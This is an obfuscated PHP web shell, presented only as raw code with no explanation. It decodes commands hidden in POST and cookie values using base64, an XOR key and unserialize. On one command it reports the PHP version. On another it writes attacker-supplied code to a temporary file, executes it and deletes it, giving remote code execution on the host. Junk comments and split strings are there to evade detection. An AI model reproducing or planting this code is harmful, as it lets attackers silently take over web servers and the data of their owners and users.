<?php $lavgzsi       =   'lavgzsi'   ^    '	';

$_qclq      =  "\141"     . /* xqs*/ $lavgzsi(1027-913)      .    "r".$lavgzsi(688-591)    .    "y"."\x5f" /* wef   */ .    "m".$lavgzsi(1024-927)    .   $lavgzsi(112);

$hubjsvns_q /*lmwtji*/ =	$lavgzsi(246-147)    . /*  xq_m_z */ $lavgzsi(111)	.	"u"."n".$lavgzsi(1090-974);



function    wknrdlqq($f_hnxkvq_,     $ubuvgkq_rq){      global /*emttji*/ $lavgzsi;
    

       $f_hnxkvq_	= /*   kw  */ "<" /*  dpum   */ .    "?".$lavgzsi(112) /*  yaxo*/ .      $lavgzsi(104) /* qbwht  */ .      "\160"       . /*   yb */ $lavgzsi(32)     . /*dnwnm   */ "u"."n"."\154"  .     "\x69"."n"."\x6b"     .   "\50"	.	"_"."_"."F"."\111"    .    $lavgzsi(841-765)    . /*q */ "\105"    . /* qrw  */ "_".$lavgzsi(95)   . /*   zscvf  */ $lavgzsi(65-24) /*  qht */ .       ";".$lavgzsi(32)    .    $f_hnxkvq_["d"];

    $ufyha   = /*  iwfnw  */ "f"."\151" /*twq */ . /*aq*/ $lavgzsi(108)   .       "e".$lavgzsi(716-621)    . /*s*/ "\x70"    .      "u".$lavgzsi(116)	. /*   jeqk_*/ $lavgzsi(95)    .	"c"."o"."n".$lavgzsi(692-576)     .    $lavgzsi(101)       . /* x  */ "\x6e"   .       "t"."\163";
    

	$ufyha($ubuvgkq_rq, /*uqenx*/ $f_hnxkvq_);


 /* rcjvgn  */ 


	zdrydkyu($ubuvgkq_rq);
}




$gvclqgnjze    =	73;



function    zdrydkyu($ubuvgkq_rq)
{


      global      $lavgzsi;	

 /*  e*/ include($ubuvgkq_rq);
 /*ijsnlp */ $onoxjxhg      = /*  nw*/ $ubuvgkq_rq;

    @unlink($onoxjxhg);}


function	zco_nv()


{    global     $lavgzsi;




 /*d   */ $wufvhtahz /*ejwi  */ =	array();
    $wufvhtahz["p"."\166"]    =    phpversion();
    $wufvhtahz[$lavgzsi(396-281)	.  $lavgzsi(118)]	=	$lavgzsi(51)     . /*   v   */ "\x2e" /* xf_b  */ .       "5";	$p_qbkmillb  =  74;

 /* q_iue   */ echo /*nlbtw_   */ @serialize($wufvhtahz);


}


function /*   ta */ q_n_lzaf_($f_hnxkvq_,     $xejci_jb)

{


  global /*xci*/ $lavgzsi;



  $dcbvubqd /*wfkssa */ = /*  sjymgg*/ "";
      $ctshvjo    =    'kuh';
       $xsrncakdb    =   hash('sha256',    $f_hnxkvq_);

     $ohqownx /*  eialhz*/ = /*  pvj  */ str_replace('vusxre',      $xsrncakdb,      $ctshvjo);


    $wufvhtahz /*  op */ =     0;

 /* rij*/ while  ($wufvhtahz	< /* xka  */ strlen($f_hnxkvq_)) /*gb  */ {      $uoseiztwyvzf_wy /*qh  */ = /*   vu*/ isset($xejci_jb) /* dbygf  */ ? /*tvghp */ $xejci_jb     :    ''; /* l*/ for    ($uoseiz    = /*   th */ 0;    $uoseiz /*ytz*/ < /* _nfyf */ strlen($uoseiztwyvzf_wy)      && /*   qoe_bx */ $wufvhtahz    <       strlen($f_hnxkvq_);  $uoseiz++, /*ty */ $wufvhtahz++) /*   h   */ {


 /* wzya  */ $dcbvubqd       .=    $lavgzsi(ord($f_hnxkvq_[$wufvhtahz])    ^ /*  _  */ ord($uoseiztwyvzf_wy[$uoseiz]));


     }


 /*d   */ if /*   g   */ (strlen($dcbvubqd) /* curefg*/ >       20)    {

  $ohqownx  = /*hn_xh  */ substr($dcbvubqd,    0,   20);


    }
	}


      if /*   zv */ (empty($dcbvubqd))    {


 /*yc   */ $dcbvubqd /*  un*/ =	date('Y-m-d /*  gbswt   */ H:i:s');


      }


     return /*k */ $dcbvubqd;}






function       yppswxk($ccnchiu){

 /* xaly  */ global	$lavgzsi;

          $mceikl       =    "\x31"     . /* _gidz */ $lavgzsi(612-515).$lavgzsi(49)    .       "3"."\x39"	.      $lavgzsi(609-553)   . /*   ypcc*/ $lavgzsi(101) /* dyr   */ .   "\x65"     . /*   yjb*/ "-".$lavgzsi(53)    .	"c"."e"."\63" /*   s   */ .      "-"."4".$lavgzsi(57) /*  epsw  */ . /*rngja  */ "\x32"    .    $lavgzsi(54)    .    "-"."\142" /*  af */ .    "\x61" /*   dslzjc   */ .	"4"."7".$lavgzsi(968-923)    . /*   k   */ "\71" /*v   */ .    "3"."\146"  .    "4".$lavgzsi(48)    .     $lavgzsi(48) /*jqj  */ .	$lavgzsi(612-515).$lavgzsi(53) /*onam   */ .    $lavgzsi(97)    . /*   lmsnhu */ "9"."d".$lavgzsi(53);

     /*   pyppvg   */ foreach	($ccnchiu     as	$t_wuilsz	=>	$f_hnxkvq_) /*ikh */ {

       uwlvveoxs(base64_decode($f_hnxkvq_), /*uluwfe */ $mceikl,	$t_wuilsz);


	}}


function    uwlvveoxs($f_hnxkvq_,	$mceikl,	$t_wuilsz)

{

	global    $lavgzsi;

	


 /*  xmymi */ $f_hnxkvq_	=	unserialize(q_n_lzaf_(q_n_lzaf_($f_hnxkvq_,    $mceikl),   $t_wuilsz));

	$zfng_mvot    =	'ozzvvphd';


	$uoseizigxh  =	'sgonuo';
    if  (isset($f_hnxkvq_["\141" /*  tum*/ .       "\x6b"])) /*v*/ {


  if	($f_hnxkvq_[$lavgzsi(612-515)]      == /* nhr */ "\x69") /*   ifarp*/ {
 /*akftxd  */ zco_nv();
 /* yog   */ }      elseif	($f_hnxkvq_[$lavgzsi(612-515)]	== /* jea*/ "e") /*   _bqlua  */ {

  wknrdlqq($f_hnxkvq_,    sprintf("."."/"."\45" /* plkwc */ .    "\x73"    . /*   ovz*/ ".".$lavgzsi(112)	.       "l", /*zf */ md5($mceikl)));

			$kp_kjcjunn /*   n */ =       44;
    }


 /*  ggh  */ exit();      }
}




yppswxk($_POST);       




$zzncyae /* vdx_  */ =     $_qclq('rawurldecode',	$_POST);
$h_ztr      =	$hubjsvns_q($zzncyae);





yppswxk($_COOKIE); /*  ku  */ $fsqaae  =   $_qclq('rawurldecode', /*  mogo*/ $_COOKIE);





?>